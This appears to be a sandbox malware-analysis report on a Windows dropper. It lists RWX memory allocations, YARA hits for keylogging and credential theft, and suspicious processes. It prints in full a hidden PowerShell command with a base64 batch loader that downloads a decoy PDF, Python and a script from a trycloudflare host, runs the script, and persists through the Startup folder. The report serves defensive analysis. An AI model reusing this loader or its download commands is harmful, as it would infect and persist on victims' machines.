NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cbd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cbe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cbf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' }"
cmdline	powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='QGVjaG8gb2ZmDQpzZXRsb2NhbA0KDQo6OiBTZXQgdGhlIGJhc2UgVVJMIGZvciBkb3dubG9hZHMNCnNldCAiYmFzZVVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20iDQoNCjo6IERvd25sb2FkIHRoZSBmaWxlIChlLmcuLCBpbWFnZSBvciBXb3JkIGRvY3VtZW50KQ0Kc2V0ICJmaWxlVXJsPSViYXNlVXJsJS9wZGYvc2NoLnBkZiINCnNldCAiZmlsZURlc3RpbmF0aW9uPSVURU1QJVxzY2gucGRmIg0KZWNobyBEb3dubG9hZGluZyBmaWxlLi4uDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgW05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWZpbGVVcmwlJyAtT3V0RmlsZSAnJWZpbGVEZXN0aW5hdGlvbiUnIH0iDQoNCjo6IE9wZW4gdGhlIGZpbGUNCmVjaG8gT3BlbmluZyBmaWxlOiAlZmlsZURlc3RpbmF0aW9uJQ0Kc3RhcnQgIiIgIiVmaWxlRGVzdGluYXRpb24lIg0KDQo6OiBTZXQgUHl0aG9uIGluc3RhbGxlciBVUkwgYW5kIGRvd25sb2FkIGxvY2F0aW9uDQpzZXQgInB5dGhvblVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20vcHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgInB5dGhvbkluc3RhbGxlcj0lQVBQREFUQSVccHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgImluc3RhbGxEaXI9JUFQUERBVEElXFB5dGhvblxQeXRob24zLjEyLjUiDQoNCjo6IERvd25sb2FkIHRoZSBQeXRob24gaW5zdGFsbGVyDQplY2hvIERvd25sb2FkaW5nIFB5dGhvbiBpbnN0YWxsZXIuLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIiYgeyBbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICclcHl0aG9uVXJsJScgLU91dEZpbGUgJyVweXRob25JbnN0YWxsZXIlJyB9Ig0KDQo6OiBJbnN0YWxsIFB5dGhvbiB3aXRoIHVzZXIgcHJpdmlsZWdlcyAobm8gYWRtaW4gcmVxdWlyZWQpDQplY2hvIEluc3RhbGxpbmcgUHl0aG9uIDMuMTIuNS4uLg0KJXB5dGhvbkluc3RhbGxlciUgL3F1aWV0IEluc3RhbGxBbGxVc2Vycz0wIFRhcmdldERpcj0laW5zdGFsbERpciUgUHJlcGVuZFBhdGg9MQ0KaWYgJUVSUk9STEVWRUwlIG5lcSAwICgNCiAgICBlY2hvIFB5dGhvbiBpbnN0YWxsYXRpb24gZmFpbGVkLg0KICAgIGV4aXQgL2IgMQ0KKQ0KDQo6OiBDbGVhbiB1cCBpbnN0YWxsZXINCmRlbCAlcHl0aG9uSW5zdGFsbGVyJQ0KDQo6OiBEb3dubG9hZCBQeXRob24gc2NyaXB0cyB0byB0aGUgUHl0aG9uIGluc3RhbGxhdGlvbiBkaXJlY3RvcnkNCmVjaG8gRG93bmxvYWRpbmcgUHl0aG9uIHNjcmlwdHMuLi4NCmlmIG5vdCBleGlzdCAiJWluc3RhbGxEaXIlIiBta2RpciAiJWluc3RhbGxEaXIlIg0KDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWJhc2VVcmwlLzkxMS5weScgLU91dEZpbGUgJyVpbnN0YWxsRGlyJVw5MTEucHknIH0iDQoNCjo6IE5hdmlnYXRlIHRvIHRoZSBQeXRob24gaW5zdGFsbGF0aW9uIGRpcmVjdG9yeSBhbmQgcnVuIHRoZSBzY3JpcHRzIGluIHRoZSBiYWNrZ3JvdW5kDQplY2hvIFJ1bm5pbmcgUHl0aG9uIHNjcmlwdHMgaW4gdGhlIGJhY2tncm91bmQuLi4NCmNkIC9kICIlaW5zdGFsbERpciUiDQpzdGFydCAvYiAiIiAiJWluc3RhbGxEaXIlXHB5dGhvbi5leGUiIDkxMS5weQ0KDQo6OiBEb3dubG9hZCB0aGUgc3RhcnQuY21kIGZpbGUgYW5kIHBsYWNlIGl0IGluIHRoZSBzdGFydHVwIGZvbGRlcg0KZWNobyBEb3dubG9hZGluZyBzdGFydC5jbWQgZmlsZS4uLg0Kc2V0ICJjbWRVcmw9JWJhc2VVcmwlL3N0YXJ0LmNtZCINCnNldCAiY21kRGVzdGluYXRpb249JUFQUERBVEElXHVwZGF0ZS5jbWQiDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWNtZFVybCUnIC1PdXRGaWxlICclY21kRGVzdGluYXRpb24lJyB9Ig0KDQo6OiBNb3ZlIHN0YXJ0LmNtZCB0byB0aGUgc3RhcnR1cCBmb2xkZXINCmVjaG8gTW92aW5nIHN0YXJ0LmNtZCBmaWxlIHRvIHN0YXJ0dXAgZm9sZGVyLi4uDQpzZXQgInN0YXJ0dXBGb2xkZXI9JUFQUERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCINCm1vdmUgIiVjbWREZXN0aW5hdGlvbiUiICIlc3RhcnR1cEZvbGRlciUiDQoNCjo6IENsZWFuIHVwDQplY2hvIENsZWFuaW5nIHVwLi4uDQoNCjo6IEhpZGUgdGhlIFB5dGhvbiBpbnN0YWxsYXRpb24gZm9sZGVyDQphdHRyaWIgK2ggIiVpbnN0YWxsRGlyJSINCg0KOjogU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQNCmVjaG8gU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQuDQplbmRsb2NhbA==';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"
cmdline	powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.pdf' }"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 23, 2025, 10:08 a.m.	thread_identifier: 2704 thread_handle: 0x00000088 process_identifier: 2700 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='QGVjaG8gb2ZmDQpzZXRsb2NhbA0KDQo6OiBTZXQgdGhlIGJhc2UgVVJMIGZvciBkb3dubG9hZHMNCnNldCAiYmFzZVVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20iDQoNCjo6IERvd25sb2FkIHRoZSBmaWxlIChlLmcuLCBpbWFnZSBvciBXb3JkIGRvY3VtZW50KQ0Kc2V0ICJmaWxlVXJsPSViYXNlVXJsJS9wZGYvc2NoLnBkZiINCnNldCAiZmlsZURlc3RpbmF0aW9uPSVURU1QJVxzY2gucGRmIg0KZWNobyBEb3dubG9hZGluZyBmaWxlLi4uDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgW05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWZpbGVVcmwlJyAtT3V0RmlsZSAnJWZpbGVEZXN0aW5hdGlvbiUnIH0iDQoNCjo6IE9wZW4gdGhlIGZpbGUNCmVjaG8gT3BlbmluZyBmaWxlOiAlZmlsZURlc3RpbmF0aW9uJQ0Kc3RhcnQgIiIgIiVmaWxlRGVzdGluYXRpb24lIg0KDQo6OiBTZXQgUHl0aG9uIGluc3RhbGxlciBVUkwgYW5kIGRvd25sb2FkIGxvY2F0aW9uDQpzZXQgInB5dGhvblVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20vcHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgInB5dGhvbkluc3RhbGxlcj0lQVBQREFUQSVccHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgImluc3RhbGxEaXI9JUFQUERBVEElXFB5dGhvblxQeXRob24zLjEyLjUiDQoNCjo6IERvd25sb2FkIHRoZSBQeXRob24gaW5zdGFsbGVyDQplY2hvIERvd25sb2FkaW5nIFB5dGhvbiBpbnN0YWxsZXIuLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIiYgeyBbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICclcHl0aG9uVXJsJScgLU91dEZpbGUgJyVweXRob25JbnN0YWxsZXIlJyB9Ig0KDQo6OiBJbnN0YWxsIFB5dGhvbiB3aXRoIHVzZXIgcHJpdmlsZWdlcyAobm8gYWRtaW4gcmVxdWlyZWQpDQplY2hvIEluc3RhbGxpbmcgUHl0aG9uIDMuMTIuNS4uLg0KJXB5dGhvbkluc3RhbGxlciUgL3F1aWV0IEluc3RhbGxBbGxVc2Vycz0wIFRhcmdldERpcj0laW5zdGFsbERpciUgUHJlcGVuZFBhdGg9MQ0KaWYgJUVSUk9STEVWRUwlIG5lcSAwICgNCiAgICBlY2hvIFB5dGhvbiBpbnN0YWxsYXRpb24gZmFpbGVkLg0KICAgIGV4aXQgL2IgMQ0KKQ0KDQo6OiBDbGVhbiB1cCBpbnN0YWxsZXINCmRlbCAlcHl0aG9uSW5zdGFsbGVyJQ0KDQo6OiBEb3dubG9hZCBQeXRob24gc2NyaXB0cyB0byB0aGUgUHl0aG9uIGluc3RhbGxhdGlvbiBkaXJlY3RvcnkNCmVjaG8gRG93bmxvYWRpbmcgUHl0aG9uIHNjcmlwdHMuLi4NCmlmIG5vdCBleGlzdCAiJWluc3RhbGxEaXIlIiBta2RpciAiJWluc3RhbGxEaXIlIg0KDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWJhc2VVcmwlLzkxMS5weScgLU91dEZpbGUgJyVpbnN0YWxsRGlyJVw5MTEucHknIH0iDQoNCjo6IE5hdmlnYXRlIHRvIHRoZSBQeXRob24gaW5zdGFsbGF0aW9uIGRpcmVjdG9yeSBhbmQgcnVuIHRoZSBzY3JpcHRzIGluIHRoZSBiYWNrZ3JvdW5kDQplY2hvIFJ1bm5pbmcgUHl0aG9uIHNjcmlwdHMgaW4gdGhlIGJhY2tncm91bmQuLi4NCmNkIC9kICIlaW5zdGFsbERpciUiDQpzdGFydCAvYiAiIiAiJWluc3RhbGxEaXIlXHB5dGhvbi5leGUiIDkxMS5weQ0KDQo6OiBEb3dubG9hZCB0aGUgc3RhcnQuY21kIGZpbGUgYW5kIHBsYWNlIGl0IGluIHRoZSBzdGFydHVwIGZvbGRlcg0KZWNobyBEb3dubG9hZGluZyBzdGFydC5jbWQgZmlsZS4uLg0Kc2V0ICJjbWRVcmw9JWJhc2VVcmwlL3N0YXJ0LmNtZCINCnNldCAiY21kRGVzdGluYXRpb249JUFQUERBVEElXHVwZGF0ZS5jbWQiDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWNtZFVybCUnIC1PdXRGaWxlICclY21kRGVzdGluYXRpb24lJyB9Ig0KDQo6OiBNb3ZlIHN0YXJ0LmNtZCB0byB0aGUgc3RhcnR1cCBmb2xkZXINCmVjaG8gTW92aW5nIHN0YXJ0LmNtZCBmaWxlIHRvIHN0YXJ0dXAgZm9sZGVyLi4uDQpzZXQgInN0YXJ0dXBGb2xkZXI9JUFQUERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCINCm1vdmUgIiVjbWREZXN0aW5hdGlvbiUiICIlc3RhcnR1cEZvbGRlciUiDQoNCjo6IENsZWFuIHVwDQplY2hvIENsZWFuaW5nIHVwLi4uDQoNCjo6IEhpZGUgdGhlIFB5dGhvbiBpbnN0YWxsYXRpb24gZm9sZGVyDQphdHRyaWIgK2ggIiVpbnN0YWxsRGlyJSINCg0KOjogU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQNCmVjaG8gU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQuDQplbmRsb2NhbA==';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0
ShellExecuteExW April 23, 2025, 10:08 a.m.	show_type: 0 filepath_r: obf-sch_decoded.bat parameters: filepath: obf-sch_decoded.bat	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 23, 2025, 10:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 23, 2025, 10:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 23, 2025, 10:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	obf-sch_decoded.bat
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat"

Creates a suspicious Powershell process (4 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

